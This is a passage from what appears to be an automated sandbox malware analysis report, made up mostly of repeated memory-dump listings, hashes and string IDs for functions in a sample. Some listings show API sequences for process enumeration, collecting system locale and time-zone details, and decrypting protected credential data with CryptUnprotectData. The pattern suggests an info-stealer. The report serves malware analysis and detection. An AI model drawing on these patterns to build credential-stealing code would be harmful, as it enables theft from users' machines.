                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 3ac1d477537e175d361b6eee08c87502b0f36ea7b2748c0631af9885fde65356
                                • Instruction ID: c9e227a672029895a5f947983f5bac2aeffe31c21bab9044a361093d21b88183
                                • Opcode Fuzzy Hash: 3ac1d477537e175d361b6eee08c87502b0f36ea7b2748c0631af9885fde65356
                                • Instruction Fuzzy Hash: 37B14C70901214DFCB14CF59C98CB95B7F1FB48315F29C1A9D458AB2A2D776AE86CF80
                                Function 01021AB7 Relevance: 10.4, Strings: 7, Instructions: 1689COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >i$TuO$_X~=$aawn$~l7?$~l7?$u\{
                                • API String ID: 0-215019335
                                • Opcode ID: 2d048d397bc585136fa7264eb9a67446e7bbb9f22e08a6190fd23661644843f9
                                • Instruction ID: 844198c2c214139eeee3d2252d9865c8b90821e1b501d457fa186606223228a2
                                • Opcode Fuzzy Hash: 2d048d397bc585136fa7264eb9a67446e7bbb9f22e08a6190fd23661644843f9
                                • Instruction Fuzzy Hash: 10B238F360C2049FE304AE2DEC8567AF7E9EF94720F16893DE6C5C3744EA3598058696
                                Function 0101CA15 Relevance: 10.4, Strings: 7, Instructions: 1643COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A$.`~$HT,\$Nt?^$Us/$`E:$i*<
                                • API String ID: 0-3280309051
                                • Opcode ID: 677e1bf2be0f132f6d53f8a17c1ab23f9e846597e11e453a3f0d9487e5062c38
                                • Instruction ID: ef4ecdc6805f6367f2f9f2cea934c65d71ce0062123fe87fde8061d6fdaccae1
                                • Opcode Fuzzy Hash: 677e1bf2be0f132f6d53f8a17c1ab23f9e846597e11e453a3f0d9487e5062c38
                                • Instruction Fuzzy Hash: 66B207F3A0C2049FE3046E2DEC8567ABBE9EF94320F1A893DE6C4C7744E67558058697
                                Function 0101AF8C Relevance: 10.4, Strings: 7, Instructions: 1625COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :./$I\?o$Q~$$jR$nR$wuxp$/b;
                                • API String ID: 0-2325388087
                                • Opcode ID: 42b070f3d67430ae3f85095272f2564a023380537d7b4985385df7fa11545dc3
                                • Instruction ID: 608fe5683f1ff0bb7501eb1c32215fd229d0e172033e555b0f2d81b1b75f6e96
                                • Opcode Fuzzy Hash: 42b070f3d67430ae3f85095272f2564a023380537d7b4985385df7fa11545dc3
                                • Instruction Fuzzy Hash: 9DB23BF3A0C2009FE3046E2DEC8567AFBE9EF94720F1A493DEAC5C3744E97558058696
                                Function 01019458 Relevance: 9.0, Strings: 6, Instructions: 1545COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A-DI$bTvw$e__$7kn$Y&$no
                                • API String ID: 0-301546087
                                • Opcode ID: 979e2f840d4e01996f4c5413b837dcb40ad5454fe128282fd8e1ff92fae3d8b6
                                • Instruction ID: 729bb38ab196d650e9f6f7c198148bf3dd3db2c977fe26b8d5582b05adbcd5d2
                                • Opcode Fuzzy Hash: 979e2f840d4e01996f4c5413b837dcb40ad5454fe128282fd8e1ff92fae3d8b6
                                • Instruction Fuzzy Hash: 79B2D4F3A0C204AFE3046E29EC8567AFBE9EF94720F16493DE6C483744E63598458797
                                Function 00C92C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00C92C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C92C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00C92C58
                                • wsprintfA.USER32 ref: 00C92C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 2ec62c9511b3e6e881d31d46a22227c602ed094e82098b3c57c36748a5d4b6a4
                                • Instruction ID: 90a02d9ab99140ea40b15c0dc8e7c6c9520404554dfb6589b90a2864eaf663c7
                                • Opcode Fuzzy Hash: 2ec62c9511b3e6e881d31d46a22227c602ed094e82098b3c57c36748a5d4b6a4
                                • Instruction Fuzzy Hash: C601F771A40604BFDB188B59DC49B6AB769EB89721F008369F915DB2C0D774290486D1
                                Function 00C77750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C7775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C77765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C7778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00C777AD
                                • LocalFree.KERNEL32(?), ref: 00C777B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 5cd1ad68695481f6d765ccaad381470586a8991b988d18140c1cd09eff925646
                                • Instruction ID: bdac8102c18cc7571be48dcd4905a42ce25e65ef169fe90cd8e2226c1e8b7f7e
                                • Opcode Fuzzy Hash: 5cd1ad68695481f6d765ccaad381470586a8991b988d18140c1cd09eff925646
                                • Instruction Fuzzy Hash: A5011E75B40308BFEB10DB959C4AFAA7B78EB49B51F108155FA09EB2C0D6B0A9048B90
                                Function 01023642 Relevance: 6.6, Strings: 4, Instructions: 1617COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: IMk$U)/$`[ww$u?~
                                • API String ID: 0-1566643718
                                • Opcode ID: 75592c31f12aa7a69b9bcb35dab8d30c2fbb5ddffad5eb3191234bb8b43b4c53
                                • Instruction ID: 249482c0c7565f3c0c18866231afa836e2f6ab22047885498be0b0314f0a4f1b
                                • Opcode Fuzzy Hash: 75592c31f12aa7a69b9bcb35dab8d30c2fbb5ddffad5eb3191234bb8b43b4c53
                                • Instruction Fuzzy Hash: 27B219F3A082049FE7046E2DEC8577ABBE9EF94720F1A853DEAC4C3744E93558058697
                                Function 0101E6EE Relevance: 6.5, Strings: 4, Instructions: 1539COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "7[$;?Gw$C4z$OUy_
                                • API String ID: 0-4188494894
                                • Opcode ID: 2430429ef29aa02b3f344bc5b5be599a47426541cd1968040b9fdb28252399bf
                                • Instruction ID: 8233526c3347f80d5ef07f86f9e5f2ae09aa1db5aefe69ec78adb83e8d9d23da
                                • Opcode Fuzzy Hash: 2430429ef29aa02b3f344bc5b5be599a47426541cd1968040b9fdb28252399bf
                                • Instruction Fuzzy Hash: C7A2E6F3A0C2009FE3056E2DEC8576ABBE9EF94760F1A493DEAC4C3744E63558058697
                                Function 00C93A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C971E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00C971FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C93A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 00C93AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00C93ABF
                                  • Part of subcall function 00C97310: lstrlen.KERNEL32(------,00C75BEB), ref: 00C9731B
                                  • Part of subcall function 00C97310: lstrcpy.KERNEL32(00000000), ref: 00C9733F
                                  • Part of subcall function 00C97310: lstrcat.KERNEL32(?,------), ref: 00C97349
                                  • Part of subcall function 00C97280: lstrcpy.KERNEL32(00000000), ref: 00C972AE
                                • CloseHandle.KERNEL32(00000000), ref: 00C93BF7
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375401173.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1375439838.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_c70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 4db656589f8441923b1800262bb22e5ff788ada132f7a34495e3627d17625b48
                                • Instruction ID: 04992a26c560edf8aca9ef98a9369f28acef565467ce283e5cad99075f7a9975
                                • Opcode Fuzzy Hash: 4db656589f8441923b1800262bb22e5ff788ada132f7a34495e3627d17625b48
                                • Instruction Fuzzy Hash: 70810630905255CFCB14CF19C98CB95B7F1FB45324F29C2A9D419AB2A2D776AE86CF80
                                Function 00C7EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00C7EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00C7EA7E
                                • lstrcat.KERNEL32(00C9CFEC,00C9CFEC), ref: 00C7EB27
                                • lstrcat.KERNEL32(00C9CFEC,00C9CFEC), ref: 00C7EB49
                                Memory Dump Source
                                • Source File: 00000002.00000002.1366965135.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                                • Associated: 00000002.00000002.1366507863.0000000000C70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1366965135.0000000000EA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370553181.0000000000EBA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000000EBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001130000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001137000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1370861024.0000000001146000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000002.00000002.1374736476.0000000001147000.00000080.00000001.01000000.00000003.sdmpDownload File
